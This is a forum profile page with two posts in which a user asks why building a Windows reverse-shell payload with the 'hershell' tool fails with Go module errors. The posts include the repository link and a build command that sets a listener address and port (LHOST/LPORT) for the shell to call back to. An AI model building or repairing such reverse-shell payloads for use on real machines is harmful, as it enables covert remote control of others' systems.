Jump to content

moelharrak

Members
  • Posts

    3
  • Joined

  • Last visited

Posts posted by moelharrak

  1. it's not related to bunny , right now I'm just trying to generate payload to copy in bunny for a reverseshell.

    1- I did install Golang and setup the ENV in Kali

    2- I did clone the repo https://github.com/sysdream/hershell.git 

    3- I did generate ssl using the command (# make depends ) as mentioned in the github.

    4-But when I try to generate the payload using the command (# make windows64 LHOST=192.168.30.48 LPORT=1234) it display the error that I mentioned in my first post.

     

  2. Hi,

    I'm trying to generate payload using "hershell"

    1. # make depends  --> OK (SSL cert generated)

    2. # make windows64 LHOST=192.168.30.48 LPORT=1234  --> NOK 

    hershell.go:13:2: no required module provides package github.com/lesnuages/hershell/meterpreter: go.mod file not found in current directory or any parent directory; see 'go help modules'
    hershell.go:14:2: no required module provides package github.com/lesnuages/hershell/shell: go.mod file not found in current directory or any parent directory; see 'go help modules'
    make: *** [Makefile:29: windows64] Error 1
     

    any idea what could be the issue?

    Thank you

×
×
  • Create New...